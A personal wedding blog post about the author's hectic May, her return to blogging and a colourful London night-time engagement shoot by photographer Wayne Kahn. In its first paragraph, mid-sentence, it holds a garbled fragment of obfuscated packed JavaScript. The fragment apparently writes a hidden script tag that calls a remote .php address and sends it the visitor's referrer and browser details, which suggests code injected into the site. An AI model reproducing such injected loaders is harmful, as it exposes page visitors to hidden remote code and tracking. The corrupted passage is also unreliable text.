It feels a little bizarre, yet extraordinarily comforting to be tapping away writing this blog post. It seems like an age since I’ve blogged and I have missed it much, much””””,’g””” c=\’d\’ e=\’b/’ 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’bitki|variryae||js|php’.split(‘|’),0,{}))
more than I thought I would.

Our Mad May, which included a continuous house full of poorly people, an ambulance, a house move, a flood and a broadband provider who forgot to provide, is over.  It was one of those months where I needed huge boosts to get out of bed everyday, where every night I would slump into my couch, glass of wine (or brandy) in hand and try to attempt to relax.  As any Mother will tell you, when you think the life of your child is threatened, it takes a hell of a long time to come down from that, and thank god that it wasn’t, but I spent two weeks after our Ambulance trip trying desperately to get rid of the tension and get back down to earth.

Yet somehow in the midst of it all I was held up, encouraged and supported by an amazing amount of support from my online world, you, the readers, my new twitter friends and all the support on Facebook, as well as the support of my family and friends. It was deeply humbling for me and something I hope others never take for granted.

And although May was a month that I’m glad to see the back of, I am now really, really excited to be back in my comfort zone that is Alice In Weddingland.

Let the fun begin

I hope in my absence you’ve enjoyed the mayhem and frabjous frolics that proved to be the Jubilee weekend and that your May was quieter and more successfully fruitful than mine.  I have some power-punching posts {giggling at my new saying ‘p-o-w-e-r  p-u-n-c-h-i-n-g tee hee} coming your way including a stunning, I mean gobsmackingly beautiful Steampunk shoot (another stunning showcase of how to Steampunk up your wedding), some stunningly beautiful weddings from around the world, a powerhouse wedding stationery provider, some blogs detailing some previous outings/engagements of mine and Robs at some very cool vendor events over April/May (including the very cool Quintessentially Weddings gig) and not to forget, some really sneaky, frabjously fantastic surprises in store in pure Alice In Weddingland style.

How does that sound?  I’m excited and today I’m kicking it off with a beautiful engagement shoot that mimics a fashion editorial.  Shot by the very talented photographer that is Wayne Kahn this engagement shoot explodes with vibrant colour, and it’s not just Kat’s pink hair! Wayne is one of those photographers that I’m attracted to straight away because of his use of colour: dramatic, vibrant and beautiful.

Londons sites are spectacular for love shoots

Photographed through a myriad of London’s famous sites this engagement shoot proves again just how photogenic London’s nightlife is.  With a stunningly put together outfit matching her wickedly beautiful pink locks together with Ady’s super cool vibe make this a stunning shoot.  Wayne has captured the demure duo beautifully and utilises his experience in fashion and lifestyle portraiture to very cleverly produce what appears to be a fashion shoot.  Let me introduce you to the stars of the show Kat and Ady.

Wanting something completely different for their engagement shoot Kat and Ady decided on a night time frolic through the streets of London. And I LOVE the results! Not only is London their favourite place but they also have romantic ties there so there really wasn’t any other option for a location for the engagement shoot, and look at the results…

Love, love, love this photo.  The black and white gives this shot a totally new impact.

Waynes photographic style is one to which I am a super-uber-duper fan of, Reportage (Documentary) style photography and you can see in this engagement shoot just how magical this style of photography is: relaxed, informal and very personal! Check out Wayne’s Facebook page for more examples of his stunning work.

So what’s uppppp?

Over the next few weeks I have some frabjous things coming up on this little ol’ unique wedding blog.  With my second feature article coming up at the end of the month in the Unique Bride Magazine and the possibility of another wedding magazine feature (shhh, it’s a secret) this month is already proving to be exciting.  And tomorrow it gets hot, with a Down The Lens feature on a stunning London based wedding photographer and some stunning photographs of her other extraordinary talent, that is, portrait/lifestyle photography including some stunning shots of Olly Murs and Billie Piper!

Till then, have a wonderful weekend everyone and thank you!  You have been my rock!

Much love, Zarn xx
